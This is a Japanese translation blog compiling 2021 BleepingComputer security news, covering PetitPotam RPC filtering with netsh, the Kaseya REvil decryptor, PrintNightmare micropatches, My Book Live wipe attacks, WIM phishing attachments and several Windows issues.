 NETSHは、管理者がネットワーク インターフェースを設定する、フィルターを追加する、Windowsファイアーウォール設定を変更することができるWindowsのコマンドライン ユーティリティである。
 この週末、
Craig Kirby は、MS-EFSRPC APIに対するリモートアクセスをブロックするNETSH RPCを公開した。これは、非認証のPetitPotam攻撃を効果的にブロックする。
 セキュリティ研究者
Benjamin Delpy によると、あなたは、以下の内容を'block_efsr.txt'と名付けたファイルにコピーし、それをデスクトップに保存することで、このフィルターを使用することができる。
rpc 
 特権が昇格されたコマンドプロンプトが開くのでNETSHを使用して、このフィルターをインポートするために以下のコマンドをタイプする。
netsh -f %userprofile%\desktop\block_efsr.txt
 
 以下のコマンドを実行することで、このフィルタが追加されたか否かを検証することができる。
netsh rpc filter show filter
 
 このコマンドを実行すると、netshは、二つのフィルタ(c681d488-d850-11d0-8c52-00c04fd90f7e と df1941c5-fe89-4e79-bf10-463657acf44d)を以下の画像のように表示するはずである。
 
 このフィルタが適切であれば、PetitPotamはもはや動作しないが、EFSは、そのデバイス上で通常通り操作を継続する。
 何時かMicrosoftが、この攻撃を防御するためにこのAPIを修正したなら、以下のコマンドを使用してこのフィルタを削除することができる。
netsh rpc filter delete filter filterkey=[key]
 
 フィルタキー(filterKey)は、上述したように、設定されたフィルタのリストが表示された時に見つけることができる。
Registry Explorerは全てのWindowsユーザ必須のレジストリエディタである 
 BleepingComputer : News>Security(2021/08/01) 
 先週、新しいオープンソースのRegistry Editorがリリースされた。これは、WindowsのRegeditソフトウェアを凌ぐものであり、高度な機能を提供しており、今までより簡単にレジストリを編集することができる。
 
Windowsのレジストリ は、中央集権化されており、システム設定、ハードウェア設定、ユーザ設定を格納するためにオペレーティングシステムによって使用される階層化されたデータベースである。
 あなたがシステム管理者あるいは、パワーユーザであるのなら、ある時にWindows組み込みのレジストリエディタ(Regedit.exe)を使用してバグや設定を修正するためにレジストリを変更したことがあるだろう。
 しかしながら、Microsoftは、数年間彼らのレジストリエディタに対して、このアプリケーションを最新にするための多くの変更を実行していない、そして、人々が望む多くの有用な機能は無いままである。
Registry Explorerを論じる 
 先週、Windows Internalsのエキスパート
Pavel Yosifovich はRegistry Explorerと名付けたプログラムをリリースした。このプログラムは、新しい豊富な機能を搭載しレジストリエディタの最新化を目的としている。
 Registry Explorerはオープンソースプロジェクトとして
GitHub上 にリリースされた。依然として、コンパイルすることを望まない人々のために、Yosifovichは、ダウンロードして即座に稼働できる
プレコンパイルされたベータバージョン もリリースしている。
 Registry Explorerを起動した後、全てのレジストリハイブが表示されるので、ユーザーはこれを展開して、標準のWindowsレジストリエディタ同様にサブキーと値を表示できる。
 
 しかしながら、このプログラムが優れているところは、含まれているダークモード、キーと値を様々な場所にコピー&ペーストする能力、Undoチェンジボタン、高度な検索機能にある。
 Registry Explorerの検索機能は、Regeditの検索機能より遥かに高度であり、以下に示すように検索した結果を単一のダイアログボックスで全ての検索結果を表示する。次に、検索結果を確認し、エントリをダブルクリックすることで、そのレジストリのキーまたは値を自動的に開くことができる。
 
 レジストリで誤った変更をすると、Windowsは正しく操作できなくなる。Registry Explorerは、Read Only Mode(読み込み専用モード)で起動する。このモードをOFFにするまで変更の実行は妨げられる。
 Registry Explorerの全機能のリストを以下に示す。
・ 実際のレジストリを表示する(標準のレジストリだけでなく)  
 更に良いのは、あなたがRegistry Explorerを本当に好むのであれば、WindowsのRegistry Editor(Regedit.exe)を、このプログラムに自動的に置き換え、.regファイル用のDefaultのファイルハンドラにするるための設定をすることができる。
 あなたが、しばしばWindows Registryを編集したり、値を検索したり、.regファイルの設定をエクスポートしているのであれば、Registry Explorerを試すことを強く推奨する。あなたは多くの機能が非常に有用であることを多分発見するだろう。
 Registry Explorerを試すには、この
プロジェクトのGitHubのページ を訪ねなさい。
Kaseyaは、REvil身代金要求型マルウェア犠牲者向けのユニバーサル復号プログラムを入手した 
 BleepingComputer : News>Security(2021/07/22) 
 Kaseyaは、7月2日のREvil身代金要求型マルウェア攻撃の犠牲者がファイルを無料で復号できるユニバーサル復号プログラムを受け取った。
 7月2日、Revil身代金要求型マルウェア作戦は、およそ60の管理サービスプロバイダと1500と見積もられる企業を暗号化するKaseya VSAリモートマネージメント アプリケーション中の0-Dayの脆弱性を攻撃する
巨大な攻撃を起動した 。
 この攻撃の後、この脅威のアクターは、ユニバーサル復号プログラムに関して
7000万$ 、MSP(マネージド・サービスプロバイダ)に関して500万$、犠牲者のネットワーク上の暗号化された拡張毎に4万$を要求した。
 
 その後直ぐ、
REvil身代金要求型マルウェアのギャングは不思議なことに姿を消し 、脅威のアクターは彼らの支払いサイトとインフラをシャットダウンした。
 
殆どの犠牲者は支払いをしていない が、このギャングが姿を消したことは、復号プログラムを購入する必要があったかもしれない企業が、そうすることを不可能にした。
 本日、Kaseyaは「信頼できるサードパーティー」からこの身代金要求型マルウェア攻撃のユニバーサル復号プログラムを受け取っり、現在影響を受けた顧客に、この復号プログラムを配布していると述べている。
 「我々は信頼できるサードパーティーから復号プログラムを入手したが、そのソースについては一切公開することはできない」と「別のサードパーティーによってこのツールの確認が行われ、影響を受けている我々の顧客にこの復号プログラムの配布を開始した」と、Kaseyaの企業マーケティング上席副社長Dana LiedholmはBleepingComputerに告げた。
 Kaseyaは、このキーのソースに関する情報を公開しないだろうが、BleepingComputerと共に確認したところによると、これは、この攻撃全体のユニバーサル復号キーであったので、全てのMSPと彼らの顧客がファイルを無料で復号することが可能になる。
 彼らが復号プログラムを入手するために身代金を支払ったのか否か尋ねたところ、Kaseyaは「肯定も否定もできない」とBleepingComputerに告げた。
 EmsisoftのCTOであるFabian WosarがBleepingComputerに告げたことによると、Emisisoftが、このキーを検証したサードパーティーであり、Kaseyaの復旧作業の支援を継続している。
 「我々はKaseyaの顧客の契約上の取り組みをサポートするためにKaseyaと協働している。我々はこのキーが犠牲者のロックを外すことに効果的であることを確認した、我々はKaseyaとその顧客に対するサポートを引き続き提供する」と、WosarはBleepingComputerに告げている。
 REvil身代金要求型マルウェア作戦に何が起きてシャットダウンし姿を消したかは不明である。そして、複数の国際的法執行機関がBleepingComputerに告げたところによると、彼らは、この脅威のアクターが姿を消したことに関与していないということであった。
 
JBS (【訳注】ブラジルに本拠を置く世界最大級の食肉会社)とKaseyaが攻撃された後、ホワイトハウスは、この身代金要求型マルウェアのギャングがロシア国内に存在すると確信し、何かを実行するように
ロシア政府に圧力をかけた 。
 ロシア政府は米国と共同歩調をとっていることを示すために、REvil身代金要求型マルウェアのギャングにシャットダウンし姿を消すように告げたと信じられている。
 この復号プログラムがREvil身代金要求型マルウェアのギャングが姿を消した後に入手されたので、ロシアが直接この身代金要求型マルウェアのギャングから受け取り、誠意の仕草として米国の法執行機関と共有した可能性がある。
 我々が、復号キーの長短に関係しているか否かをFBIに尋ねた時に告げられたことは、捜査中のことはコメントできないであった。
 「米国司法省(DOJ)とFBIは、REvil/Sodinokibi身代金要求型マルウェアの亜種の背後にいる犯罪企業と、取り分けKaseya身代金要求型マルウェア攻撃に関する責任あるアクターの犯罪調査を実行中である」と「DOJの方針に従い、この捜査中の案件についてこれ以上コメントすることはできない」と、FBIはBleepingComputerに告げている。
 REvilが姿を消したのは、このギャングのオンライン活動が終わったのではない可能性がある。
 過去に、
GandCrabランサムウェア作戦がシャットダウン され、REvilとしてブランド名が変更されている。また、REvilが新しいランサムウェア作戦として再び登場することは予想されることである。 
脆弱性攻撃されているPrintNightmareの0-Dayに非公式のパッチがリリースされた 
 BleepingComputer : News>Security(2021/07/02) 
 積極的な脆弱性攻撃の下にあるWindows Print Spoolerサービス中のPrintNightmare 0-Day脆弱性を解決するフリーのマイクロパッチが、0patchプラットフォーム上で利用可能になっている。
 このリモートコード実行のバグ(CVE-2021-34527として追跡される)の背後にあるバグだらけのコードは、Windowsの全てのバージョンに存在しているが、Microsoftは、この脆弱性が、彼らの全てのプラットフォームで脆弱性攻撃可能か否かなのかを依然として調査中である。
 CVE-2021-34527は、攻撃者がSYSTEM権限でRCEを介して
影響を受けるサーバを乗っ取り 、プログラムのインストール、データの表示、変更、削除、完全なユーザー権限を持つ新しいアカウントの作成を行うことが可能である。
 現時点で
PrintNightmare セキュリティフローを解決できるセキュリティアップデートは存在していないが、Microsoftは脆弱性のあるシステムがセキュリティ侵害されることから攻撃者をブロックするための
緩和策を公開 し、修正作業に取り組んでいる。
 そこで、0patchマイクロパッチ サービスが
フリーのマイクロパッチ 提供している。このマイクロパッチは、Windows Serverのバージョン2019, 2016, 2012(2021年6月にアップデートされた),2008 R2(2020年1月のアップデートでインストールされたが、拡張セキュリティアップデートではない)用である。
 0patchのTweeterはこちら 
 0patchによると、「上述のパッチの一部は、記述している時点では発行されていないかもしれないが、数時間後には発行されているだろう」としている。
 関連するニュースで、CISAは印刷に使用していないサーバ上のWindows Print Spoolerサービスを無効にするように管理者に促す
PrintNightmare通知 を発行した。
 Microsoftもまた、
Print Spoolerサービスを有効にしているDomain Contoroller のリスクの緩和に関するサポートドキュメントにおいて、この印刷サービスを全てのDomain ControllersとActive Directory管理システムで無効にするように推奨している。
 この企業のアドバイスは、殆どのWindowsクライアントとサーバープラットフォームでデフォルトで有効になっているという事実(このサービスが、脆弱なシステムを標的とする将来の攻撃のリスクを大幅に高める)を考慮に入れている。
 公式のセキュリティアップデートが利用可能になるまで、0patchのマイクロパッチ、もしくは
Microsoftが提供する緩和策 を適用し、PrintNightmare脆弱性攻撃を使用してネットワークに侵入されることから攻撃者をブロックすべきである。
ハッカーは0-Dayの脆弱性を使用してMy Book Liveデバイスのデータを消失させている 
 BleepingComputer : News>Security(2021/06/29) 
 Western DigitalのMy Book Live NASデバイス中の0-Dayの脆弱性は、先週、攻撃者がデバイスの大規模な工場出荷状態へのリセットを実行することを可能にしていたため、データの損失に繋がった。
 先週、我々はWestern DigitalのMy Book Live NASの所有者が、奇妙なことに保存していたファイルの消滅が突然発生したという
話を公開した 。残念なことに、この工場出荷状態へのリセットは管理者パスワードもリセットするので、ユーザはWebダッシュボードやSSHを介してデバイスにログインすることができなくなる。
 一部のユーザがデバイスのログを解析した後、彼らは、6月24日にデバイスのファイルを消去するfactoryRestore.shと呼ばれるスクリプトが彼らのデバイス上で実行されていたことを発見した。
 Jun 24 00:26:53 MyBookLive factoryRestore.sh: begin script: 
 Western Digitalは、BleepingComputerに、この攻撃は
CVE-2018-18472 として追跡される2018年の脆弱性を介して実行されていると当初告げていたが、2015年以降サポートされていなかったため、この脆弱性は修正されていなかった。
 攻撃者がMy Book Liveデバイスに対する攻撃に、この脆弱性を使用したことは判明したが、実際には、工場出荷状態にリセットする原因となる別の0-Dayの脆弱性が存在していた。
工場出荷状態にリセットするために使用された0-Day 
 Censysの最高技術責任者(CTO) Derek Abdineは、My Book Liveデバイスの最新のファームウェアが、リモート攻撃者がインターネットに接続されているデバイスを工場出荷状態にリセットすることを可能にする0-Dayの脆弱性を含んでいることを明らかにした。
 工場出荷状態へのリセットは、一般的にリモート管理コンソールを介して可能であるが、それらは最初に管理者自体をデバイスに認証させることを常に要求する。
 My Book Liveのファームウェア中の適切に名付けられたsystem_factory_restoreスクリプトでは、この認証チェックはコメントアウトされていたので、誰もがそのデバイスにアクセスし工場出荷状態にリセットすることが可能になっていた。
 この0-Dayを
自主的に通知 したArs TechnicaのDan Goodinが公開したスクリプトにおいて、get()とpost()関数で、何らかの理由からWestern Digitalの開発者によって認証チェックがコメントアウトされていることを確認することができる。
 
 攻撃者がエンドポイントに対する正しいパラメータを見つけ出すことができれば、彼らは世界中のデバイスを工場出荷状態にリセットする大規模な引き金を弾くことができる。
NASの制御のための戦い 
 ハッカーはデバイスを工場集荷状態にリセットするために、この0-Dayの脆弱性を使用したが、その前のかなり長い間、悪意ある活動があったと思われる。
 Abdineによって行われた研究から、攻撃者は、2018年のCVE-2018-18472リモードコード実行脆弱性を大規模に悪用し、大っぴらに露出しているMy Book Liveデバイスに感染し、それらにボットネットを追加していた。
 以下に示すように、この脆弱性を使用して攻撃者はNASデバイス上でコマンドを実行し、リモートサイトからスクリプトをダウンロードし実行していた。
 
 影響を受けたユーザによってVirus Totalにアップロードされ確認されたペイロードの一つは、DrWebによってLinux.Ngioweb.27(IoTデバイスをターゲットにする既知のLinuxボットネット)の変種として検出された。他のペイロードもこの攻撃で確認されているが、どのマルウェアファミリーに属するのか明らかになっていない。
 一旦、ボットネットにリスト化されると、攻撃者は遠隔からMy Book Live NASデバイスを使用して、DDoS攻撃、他のデバイスへの攻撃、コマンドの実行、ファイルを盗むことさえ実行できる可能性がある。
 この攻撃はまた、様々なスクリプトをパスワードで保護し、ライバルのボットネットや他の攻撃者によって、このデバイスが乗っ取られることを防いでいる。
 我々は今、My Book Liveデバイスを標的にした様々な攻撃に対する何らかの洞察は持っているが、攻撃者がNASデバイスのデータを大規模に消去する動機に関しては分かっていない。
 Abdineは、この0-Dayを使用した大規模なデータ削除は、他の攻撃者、あるいはライバルのボットネットがデバイスをリセットすることで、このデバイスを乗っ取ろうとした可能性があると考えている。
 「大規模にこのエンドポイントにPOSTする動機に関しては不明であるが、これらのデバイスを乗っ取ったり、使用できないようにしようとしている(おそらく、ユーザー名とパスワードをDefaultのadmin/adminにリセットすることで、別の攻撃者が制御を奪うことが可能になるので)ライバルのボットネット オペレーターや、これらの問題が2015年以降存在しているため、しばらくの間存在していたであろうボットネットを他の方法で粉砕したい者が企てている可能性がある」と、Abdine氏は説明している。
 消費者向けIoTデバイスは、攻撃者が気付かれずに攻撃を実行できるためサイバー犯罪の世界で価値のある商品である。
 IoTデバイスには、セキュリティ侵害されたことを示す外部信号が殆ど無いので、攻撃者は検出されることなく悪意あるキャンペーンの一部としてそれらを長期間使用することができる。
 現時点では、ユーザーはMy Book Liveデバイスを大ぴらなアクセスから防御すべきであり(【訳注】インターネット接続を切断するということ)、ローカルネットワークやVPNの下でのみ使用すべきである。
 BleepingComputerはWesternDigitalに連絡を取り、この脆弱性のパッチをリリースするかどうかを確認したが、このデバイスは6年間サポートされていないため、パッチのリリースはないと思われる。
フィッシング攻撃の一般的ではない添付ファイルは諸刃の剣である 
 BleepingComputer : News>Security(2021/06/24) 
 脅威のアクターはセキュリティソフトウェアをバイパスするために一般的ではない添付ファイルを使用しているが、これは、彼らに対しても作用する可能性のある諸刃の剣である。
 安全なeMailゲートウェイとセキュリティソフトウェアが、より高度になり絶えず変化するフィッシングキャンペーンに対応するようになるにつれ、脅威のアクターは検出をバイパスするために、より一般的ではないファイルフォーマットに頼っている。
 従来より、フィッシングスカムは、ISOやTARファイルのようなeMailの添付ファイルとしては一般的ではない添付ファイルに切り替えてきていた。
 しかしながら、脅威のアクターが新しく一般的ではない添付ファイルを採用したので、サイバーセキュリティ企業は、それらをブロックするために更なる機能を追加している。
セキュリティをバイパスするために使用されているWIM 
 Trustwaveの新しいレポートによると、研究者は、脅威のアクターがAgent Teslaリモートアクセス トロイを拡散させるためにWIM(Windows Imaging Format)を添付ファイルとして悪用し始めていると説明している。
 「我々がサンプルから収集した全てのWIMファイルはAgent Teslaを含んでいた。この脅威は.NETで書かれたRemote Access Trojan(RAT)であり、セキュリティ侵害したシステムを完全に制御し、HTTP, SMTP, FTP, Telegramを介してデータを密かに抽出することができるものである」と、Trustwaveのセキュリティ研究者Diana Loperaはこの
レポート の中で説明している。
 これらのキャンペーンは、以下に示すようにDHL(【訳注】航空機を主体とした国際宅配便、運輸、ロジスティクスサービスを扱うドイツの国際輸送物流会社)やAlpha Trans(【訳注】米国を本拠とする輸送会社)からのシッピング情報を装うフィッシングeMailで開始される。
 このeMailに含まれているのは .wim添付ファイル(末尾は時々、.wimや.wim.001になっている)でありセキュリティソフトをバイパスするように設計されている。
 Windows Imaging Format(WIM)ファイルは、Windows Vistaとその後のオペレーティングシステムに採用することを目的にMicrosoftが開発したファイルベースのディスクイメージフォーマット(【訳注】殆どのディスクメージ形式はセクターベースイメージフォーマット)である。
 WIMファイルは、配布を簡単にするために、その全てのファイルやフォルダを単一ファイルにパックするために使用される。
 以下の画像に見られるように、Hex Editor(16進エディタ)でこれらWIM添付ファイルの一つを開くと、その中に実行ファイルが包含されていることが明らかに示されている。
 しかしながら、WIMファイルが検出される可能性は低いかもしれないが、WIMファイルを使用したフィッシングキャンペーンは、WindowsがWIMファイルを開くための組み込みメカニズムを持っていないので、より大きな問題を抱えることになる。
 それ故、ユーザがWindowsでこの添付ファイルを開こうとした時、ユーザは、以下に示すようなWIMファイルを開くためのプログラムを選択するように要求するメッセージが表示される。
 このファイルフォーマットは次ぎに、横道にそれて7-zipのようなプログラムを使用してこのファイルを解凍し、次に、その中にあるファイルをダブルクリックすることを受信者に要求するだろう。これはまず発生しない。
一般的ではない添付ファイルは諸刃の剣 
 一般的ではないファイルを使用することは、一部のセキュリティフィルタをバイパスするかもしれないが、これはまた脅威のアクターにとっても、おそらく諸刃の剣である。
 これは、このファイルが、7-zipのような特定のプログラムを持っていない殆どのデバイスで開かれることがなく、このファイルを解凍するために特別な努力を受信者に強いることが理由である。
 「一般的ではないアーカイブ ファイル フォーマットでカプセル化されたマルウェアは、ゲートウェイとスキャナをバイパスする一般的な方法の一つである。しかしながら、この戦略はまたハードルもある。ターゲットシステムはファイルタイプを認識するか、少なくともファイルを解凍して処理できるツールを備えている必要がある」と、続けて「.IMG や .ISOディスクイメージファイルとは対照的に、WIMファイルは、ディスクイメージファイルをマウントするための組み込み機能がWindowsに用意されていない。更に、他の一般的なアーカイブユーティリティWinRARとWinZipは、WIMディスクイメージを認識しない。WIMファイルは広汎に使用されている7Zipで処理することができる」と、Loperaは発言している。
 安全なeMailゲートウェイが、未だ実行されていないのであれば、直ちにこれらの添付ファイルをブロックするだろう。しかしながら、あなたがWIM添付ファイル付きのeMailに遭遇した場合には、正当な電子メールは、このファイルフォーマットを使用しないので単純に削除しなさい。
Windows 10 PCでMicrosoft Storeが世界中でクラッシュしている 
 BleepingComputer : News>Security(2021/06/23) 
 Windows 10ユーザは現在Microsoft Storeで、アプリケーションのダウンロードとインストールができず、繰り返し試みるとクラッシュする問題に遭遇している。
 Microsoft Storeからアプリケーションをダウンロードしようとすると、ユーザはロード中、あるいは、フリーズしたページを表示される。具体的には、ユーザがアプリケーションやゲームをダウンロードするために"Get"ボタンをクリックしても何も発生しない。
 様々なMicrosoft Store機能にアクセスしても、ダウンロードセクション同様に、このプログラムは回転するローディングシンボルを画面に居座らせるだけである。
 やがては、Microsoft Storeは完全にハングし、Windowsがアクティブであれば、Task ManagerもしくはAlt+F4を使用することによってのみ閉じることができる。
 クラッシュすると、エラーメッセージがEvent Viewerに記録される。今回の場合は、Windows Storeがオペレーティングシステムと相互対話できなかったと述べている。
 BleepingComputerによって確認されたレポートによると、この動作不能状態は、ここ4時間以内(本記事の配信は、日本時間 2021年06月23日 14:40)に始まっている。
 この問題に関して、Windows 10累積アップデーに起因する問題でのメンテナンス作業が計画されていたのか否か、あるいは、Microsoft Azureネットワークの問題なのかは分かっていない。
Windows 10のオプショナルアップデート機能が壊れていた、その理由 
 BleepingComputer : News>Security(2021/06/13) 
 Windows 10は毎度厄介な問題を抱える。今回の問題は、Windows Updateは一回に一つのオプショナルアップデートしか提供していない。
 一般的にMicrosoftは、Windows Updateによって自動的にインストールされない任意の新しいアップデートをリリースする。
 オプショナルアップデートは、新しいWindows 10の機能更新プログラム、Windows 10プレビュー累積アップデート、機能エクスペリエンスパック、オペレーティングシステムの特定のバグに向けた幾つかの定例外の修正が含まれる。
 しかしながら一年以上に渡り、Windows 10は、あなたのWindows 10用に利用できる複数のオプショナルアップデートがある場合でさえ、一回に一つのオプショナルアップデートしか提供していない。
 例えば、最近リリースされたWindows 10 21H1アップデートは、Windows Updateで優先的に扱われ、他の利用可能なオプションの更新プログラムに関係なく提供される。
 今週、Microsoftは、インストールしている、あるいは、起動しているゲームからユーザを妨げるXbox Game Passバグを修正する定例外の
KB5004476 Windows 10アップデート をリリースした。
 苛立たしかったことは、このアップデートをWindows 10 20H2に適用しようとした場合、私がWindows 10 21H1アップデートを最初にインストールするまで、Windows Updateが私のデバイスにこのアップデートの提供を拒否したことであった。
 Microsoftは2019年、Windows 10に新しい
"Optional Update Experience" を導入した。これは、この問題を解決し、あなたがインストールしたいオプショナルアップデートの選択を可能にすると思われていた。
 この機能は、我々がWindows 10 21H1機能更新プログラムをインストールする前でさえ見事なまでに動作しなかった。以下に示すように、我々は依然としてOptional Update画面にKB5004476オプショナルアップデートを提供されていない。
 オプショナルのWindows 10 21H1機能更新プログラムをインストールすると、Windows Updateは、オプショナルの新しいKB5004476定例外アップデートを我々に提供した。
 BleepingComputerは、複数のデバイスでこの同じステップを試みた、結果、Windows 10は全て同じ挙動を呈した。
 これらのオプショナルアップデートの一部は、Microsoft Catalogで利用可能であるが、多くの人々は
Windows Updateの手動インストール に不慣れである。
 MicrosoftがOptional Update機能で全てのオプショナルアップデート提供していない理由は定かでない。しかしながら、現在の形式では、ユーザーは実際に希望するアップデートにアクセスする前に、機能更新プログラムをインストールする必要がある。
Microsoft OfficeのMSGraphにコード実行を導く脆弱性 
 BleepingComputer : News>Security(2021/06/08) 
 Microsoftは本日、Microsoft OfficeのMSGraphコンポーネント(グラフとチャートの表示を担当する)に影響する脆弱性に対するパッチをリリースするだろう。この脆弱性はターゲットにされたマシン上でコードを実行される可能性があった。
 このコンポーネントは殆どのOfficeドキュメント中に組み込まれているため、攻撃者は、特別な機能を必要とすることなく、これを使用して悪意あるペイロードを配布することができる
レガシーコード 
  CVE-2021-31939 として追跡されるこのセキュリティフローは、Check Pointの研究者がMSGraph中に発見しMicrosoftに通知したセキュリティ脆弱性の大きなセットの部分である。
この研究者がMSGraphのセキュリティフローのテストに注目した理由は、少なくとも17年前のコードが含まれていたことにあり、Microsoft Equation Editorに似たアタックサーフェス(【訳注】攻撃領域、つまり何らかの攻撃の対象となり得る領域のこと(三和コムテックより))を持っていたことにある。そして、2017年に修正されたバグは今日まで
大量に悪用 され続けている。
 このバグがアイデンティファイアを最近取得したばかりなので、この脆弱性に関する詳細は現時点では不足している。しかしながら、Check Pointは本日の
レポート で、CVE-2021-31939は、UseーAfter-Free(【訳注】解放後のメモリ領域を参照するダングリングポインタを悪用し任意のコードを実行する攻撃(CiNiiより))と記している。
 このタイプのフローは、プログラム オペレーション中にダイナミックメモリの不正使用で構築され、そのシステム上で任意のコード実行を導くことができるものである。
 研究者によると、この問題はMSGraphファイル構文解析機能中に存在しており、「一般的に、Excel(EXCEL.EXE), Office Online Server(EXCELCNV.EXE), Excel for OSXのような様々なMicrosoft Office製品で使用されている。」
 Check Pointの本日の公開には、Microsoft OfficeのMSGraph中に発見された他の三つのセキュリティフローが含まれている。これらの全ては先月パッチされている。
・ CVE-2021-31174 : Microsoft Excelでの情報漏洩につながる範囲外読み取り(OOBR)の脆弱性 (重大度中)。 MSGraph、Office Online、Microsoft Excel に影響を与えるCVE-2021-31178 : 情報漏洩につながる範囲外読み取り (OOBR)脆弱性(重大度中)による整数アンダーフロー(【訳注】Integer Underflowとは、結果が最小許容整数値未満になり、正しい値とは異なる値が生成されること)CVE-2021-31179 : リモートでコードが実行されるメモリ破損の脆弱性(重大度高) 
 全てのフローは、ファジングによって発見された。ファジングとは、コードに様々な入力を加えてエラーやセキュリティの脆弱性を発見するテスト手法である。この方法で生成される例外には、脆弱性攻撃を導くことが可能なクラッシュやメモリリークが含まれる。
 研究者は、4つの脆弱性の全てが、ほとんどのOfficeドキュメントに埋め込まれる可能性があり、被害者が悪意のあるOfficeファイルを開くと、脆弱性がトリガーされる複数の攻撃シナリオの余地があると述べている。
 「この脆弱性が悪用された場合、攻撃者は特別に細工されたOfficeドキュメントを介して、ターゲット上で悪意あるコードを実行することができる」と、Check PointはBleepingComputerに語った。 
 「全てのOfficeスイートはExcelオブジェクトを埋め込める(これは攻撃ベクトルを広げる)ので、Word, Outlook等を含む殆ど全てのOfficeソフトウェアに対して、このような攻撃を実行することを可能にしている」- Check Point
 
 Check Pointは2月28日に、この脆弱性をMicrosoftに通知し、そのうちの3件は先月パッチが適用された。 CVE-2021-31939は後日、追跡アイデンティファイア(ID)を受け取った。本日パッチを受け取ることが予定されている。 
注意: これらのオンラインカジノのeMailは、決して彼らの約束通りにはならない 
 BleepingComputer : News>Security(2021/06/05) 
 スパマーは誤解しやすいeMailで、 Raging Bull Casino, Sports and Casino, Ducky Luck, Royal Ace Casinoのようなオンラインカジノを奨励するためにアフィリエイト・プログラムを乱用している。
 大手のオンラインカジノの多くは、他のWebサイトやインフルエンサが、彼らの製品を宣伝したり、アカウントをサインアップした人々から手数料を稼ぐことを可能にするためにアフィリエイト・プログラムを活用している。
 ユーザを紹介するために、このアフィリエイトは、アフィリエイトIDを含む特別に細工されたURLを作成したり、紹介者が新しいアカウントを登録した時に、このカジノが彼らにクレジットを与えることを可能にするクッキーをドロップする。
 今週、BleepingComputerは、オンラインカジノのアフィリエイトによって実施されているオンラインキャンペーンについて告げられた。その内容は、大金の支払いが準備されている「大賞」を勝ち取ったと述べたり、あるいは、受信者がアカウントを確認する必要があるとする、誤解させるようなeMailでユーザを爆撃しているとするものであった。
 このキャンペーンについて告げられた後、我々のeMailアカウントの一つのスパムフォルダを検証することで、我々もこのスパムキャンペーンのかなりのターゲットになっていることを確認した。
 Gmailは、eMailのこのようなタイプをスパムとしてマークする優れた仕事を実行しているが、他のフリーeMailサービスは、あなり役に立たないかもしれないので、このスパムは一般メールボックスに入る可能性がある。
 例えば、以下にRaging Bull CasinoとRoyal Ace CasinokaranoアフィリエイトスパムeMailを示す。彼らが$3,500(383,268円)の支払いを約束したり、オンラインアカウントを確認した後、ベッティングストラテジ(【訳注】ベッティングシステムとも呼ばれ、カジノなどの賭博で、どのような賭け方(ベット)をするかの戦略(Qiitaより))が共有されることを確認できる。
 このリンクをクリックすると、ユーザはアフィリエイトクッキーをドロップする別のサイトにリダイレクトされた後、このカジノにリダイレクトされる。
 以下の画像に見られるように、Raging Bull Casinoへのリダイレクトは、アフィリエイトがサインアップのクレジットを取得できるようにURLにアフィリエイトID(affid)を含んでいる。
 想像されているように、あなたが素敵な支払いを期待しているこのアカウントにサインアップしても、期待している支払いはない。代わりに、金銭を稼いでいるのは、あなたにeMailを送信したアフィリエイトだけである。
 BleepingComputerは、この記事にリストされているオンラインカジノとそれらのアフィリエイトマネージャに接触したが、回答をを受け取れなかった。
 これらの種類のeMailを受信した場合は、それらをスパムとしてマークすることでeMailプロバイダーのスパムフィルターが将来それらを認識するようにトレーニングされる。
身代金要求型マルウェアのギャングの復号プログラムの遅さは、犠牲者に代替方法を探させている 
 BleepingComputer : News>Security(2021/05/28) 
 最近大きく報道された二つの身代金要求型マルウェアの犠牲者が受け取った復号プログラムは、あまりにも遅く犠牲者のネットワークを素早く復帰させるには程遠いものだった。
 最初の犠牲者はColonial Pipelineである。
DarkSide身代金要求型マルウェア オペレーションによって攻撃された 後、彼らは復号プログラムを得るために440万$(約 4億8300万円)の身代金を支払った。
 しかしながら、この復号プログラムは大変遅いので、この企業はバックアップからの復元に頼るほどであった。
 「ハッカーは支払いを受け取ると、無効になったコンピュータ ネットワークを復元するための復号ツールをオペレーターに提供した。このツールはあまりにも遅かったため、この企業はシステムの復元に独自のバックアップを使用し続けることになったと、この企業の取り組みに精通する関係者の一人は語った」と、Bloombergは
報道 している。
 つい最近の犠牲者はHSE(アイルランドの保健サービス委員会)である。HSEは、
Conti身代金要求型マルウェアによって攻撃された が、身代金の支払いは拒否している。
 おそらく、攻撃者は間違えて政府機関をターゲットにしたことを認識し、
この攻撃に関する復号プログラムをリリース した。
 しかしながら、この復号プログラムをテストしたところ、あまりにも遅いことが分かったので、HSEは、独自の復号プログラムを使用するために、ニュージーランドのセキュリティ企業Emsisoftと協働した。このプログラムはギャングが提供した復号プログラムに比べ
2倍高速 であったと主張している。
EmsisoftのUniversal Decryptor 
 Emsisoftの復号プログラムを知った後、BleepingComputerは、HSEがこの復号プログラムを使用した方法について詳細に知るためにEmsisoftのCTO Fabian Wosarに接触した。
 Wosarは、HSEとの協働に関する情報の共有は拒否したが、この身代金要求型マルウェア オペレーションがファイルを復号するにあたり酷い仕事を実行するので、Emsisoftが、Universal Decryptorを作成したと説明した。
 例えば、Ryuk身代金要求型マルウェアの復号プログラムは、
大きなファイルを復号する時にデータ損壊に導く問題 が知られている。同様に、
Babuk Lockerの復号プログラム中のバグ は、ESXiサーバを復号する時にデータロスが発生する。
 Emsisoftの復号プログラムは、データセーフティーに設計されており、ギャングの復号プログラムよりとても高速でもある。このツールは著名で評判の高いサイバーセキュリティ企業によって提供されているものなので、脅威のアクターからの復号プログラムに悪意ある挙動が有るか無いかをチェックする必要もない。
 「我々は通常日数を短縮する。その理由は、安全か否か確認するためにリバーシングする必要がない、最初にバックアップする必要もない、配備が簡単、より良いログが取れ、最終的には大変高速になる」と、WosarはBleepingComputerに話た。
 Wosarはまた、犠牲者が複数の身代金要求型マルウェアで一斉攻撃されることは前例のないことではないと述べ、そして、このことは、Emsisoftが、彼らの復号プログラムを様々な身代金要求型マルウェアファミリーからの複数の復号キーを読み込み、一度にファイルを復号できるようすることを決定した。
 「50を超える身代金要求型マルウェアファミリーとメジャーな変種が、このプログラムによってサポートされている」と、Wosarは説明している。
Emsisoftの復号プログラムをテストする 
 Wosarは、ContiとDarkSideの公に利用可能なサンプルと、今までマルウェア解析サイトで共有されてきた彼らの復号プログラムを、BleepingComputerが、彼らの復号プログラムをテストすることに同意した。
 我々のテストの一部として、使用したのはWindows 7 2CPU仮想マシン、小さな44.8GBドライブで使用済み領域35.1GBである。
 このスペックは現実に使用されるものとは大きく異なっているが、Emsisoftの復号ツールと身代金要求型マルウェアのギャングが提供する復号プログラムとの速度を比較することは可能である。
